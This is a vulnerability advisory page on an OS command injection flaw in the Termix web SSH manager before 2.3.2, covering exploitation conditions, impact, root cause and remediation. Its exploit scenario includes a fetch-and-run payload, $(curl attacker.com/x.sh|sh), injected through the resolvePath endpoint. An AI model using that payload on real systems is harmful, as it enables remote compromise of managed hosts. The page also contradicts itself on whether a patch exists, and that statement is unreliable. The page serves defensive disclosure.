2 techniques across 1 tactic: Execution

The technique list with ATT&CK links and the kill-chain view is part of the Basic plan and up.

Exploitation Conditions

The attacker must (1) hold valid Termix authentication credentials at any privilege level (PR:L), (2) have an active File Manager SSH session already established to a target remote host, and (3) be able to reach the Termix web interface over the network (AV:N). Limiting factors: exploitation is impossible against unauthenticated visitors, against users who only use the SSH terminal or tunneling features without opening File Manager, and against Termix 2.3.2+. No user interaction is required (UI:N), and attack complexity is low (AC:L), so once the prerequisites are met any HTTP client can deliver the payload. The injection works against default configurations of Termix prior to 2.3.2 - no special server-side feature toggling is required beyond the inherent File Manager session.

Impact

Real-world risk is high but contextualized by the PR:L (low-privilege authenticated) requirement and the need for an already-established File Manager SSH session - meaning an attacker must already hold valid Termix credentials and have configured an SSH target. CVSS 9.9 with AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H accurately reflects that, once these prerequisites are met, exploitation is trivial, fully automatable, and grants full compromise of downstream managed hosts. EPSS and CISA KEV status were not provided in the input, and no public exploit identified at time of analysis; however, the vendor security advisory plainly describes the injection mechanism, lowering the barrier to weaponization. The primary risk multiplier is that Termix is a server-management tool, so a single compromised low-privilege Termix account pivots into arbitrary command execution on every SSH host that user has open in File Manager - a meaningful supply-chain-style blast radius for any organization using Termix as a centralized SSH jump platform.

Exploit ScenarioDerived

An attacker obtains low-privilege Termix credentials (via phishing, credential stuffing, or as a legitimate but malicious internal user), logs into the Termix web UI, opens a File Manager session to any SSH host they are permitted to access, and issues a crafted GET request to /ssh/file_manager/ssh/resolvePath with a path parameter containing $(curl attacker.com/x.sh|sh) or backtick-wrapped commands. The injected payload executes on the remote SSH host under the SSH session user's privileges, allowing the attacker to deploy implants, exfiltrate data, or pivot deeper into the network. No public exploit identified at time of analysis, but the advisory's description makes payload construction trivial.

AnalysisAIv1 – Jun 05, 2026

Remote command execution in Termix web-based server management platform (versions prior to 2.3.2) allows any authenticated user with an active File Manager SSH session to execute arbitrary OS commands on the connected remote host via the GET /ssh/file_manager/ssh/resolvePath endpoint. The vulnerability stems from improper shell escaping that fails to neutralize $(...) and backtick command substitution, yielding a CVSS 9.9 critical rating with scope change. No public exploit identified at time of analysis, but the vendor advisory (GHSA-37f4-wq95-pg33) provides sufficient technical detail to develop one trivially.

RemediationAI

Vendor-released patch: upgrade to Termix 2.3.2 or later, available at https://github.com/Termix-SSH/Termix/releases/tag/release-2.3.2-tag with builds for Windows, Linux, and macOS. If immediate patching is not possible, compensating controls include restricting Termix account creation and tightly auditing the user list (since any authenticated user with an active File Manager session can exploit this), disabling the File Manager feature for non-essential users if the deployment supports per-user feature flags, and placing the Termix server behind a network reverse proxy that blocks or logs requests to the /ssh/file_manager/ssh/resolvePath endpoint - note that blocking that path will break legitimate path-resolution functionality in File Manager. Additionally, treat SSH target hosts as potentially compromised if any low-trust Termix user existed pre-patch, and review SSH session logs on managed hosts for anomalous command execution. Consult the vendor advisory at https://github.com/Termix-SSH/Termix/security/advisories/GHSA-37f4-wq95-pg33 for further detail.

Technical ContextAI · show details

Termix is an open-source web-based SSH server management platform offering terminal access, tunneling, and remote file editing across Windows, Linux, macOS, Android, and iOS (per CPE cpe:2.3:a:termix-ssh:termix). The flaw is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command, aka OS Command Injection). The root cause is the resolvePath endpoint constructing shell commands by wrapping user-controlled input in double quotes - a sanitization approach that blocks naive quote-breaking but leaves shell metacharacters such as $(...) and ` ... ` (backtick command substitution) fully interpretable by POSIX shells like bash and sh. Because the command runs over an established SSH session, the injection executes on the remote managed host rather than the Termix server itself, which is reflected in the CVSS Scope:Changed (S:C) metric.

DescriptionGitHub Advisory

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the GET /ssh/file_manager/ssh/resolvePath endpoint in Termix is vulnerable to OS command injection. The endpoint uses double-quote escaping for shell command construction, which does not prevent $(...) and backtick command substitution. Any authenticated user with an active File Manager SSH session can execute arbitrary commands on the connected remote host. Version 2.3.2 patches the issue.

Executive ViewAI

Why It Matters

Termix web-based server management platform versions prior to 2.3.2 contain a critical command injection vulnerability (CVSS 9.9) enabling authenticated SSH File Manager users to execute arbitrary operating system commands on managed remote infrastructure. No public exploit has been identified at time of analysis; however, the technical details in vendor advisory GHSA-37f4-wq95-pg33 create immediate risk of unauthorized access. Organizations using affected Termix versions face exposure of all managed infrastructure to complete command-level compromise, with potential for data theft, service disruption, and widespread lateral movement.

Business Impact: Severe
Compensating Controls

No vendor-released patch identified at time of analysis. Interim mitigations: (1) Disable SSH File Manager feature if not critical to operations; (2) Restrict SSH File Manager access to minimal essential administrators and require multi-factor authentication for access; (3) Implement network segmentation isolating Termix server from general infrastructure; (4) Enable comprehensive audit logging of File Manager API calls and activities; (5) Deploy network-based detection for command substitution patterns in HTTP parameters; (6) Evaluate temporary use of alternative server management platforms for critical infrastructure pending patch release.
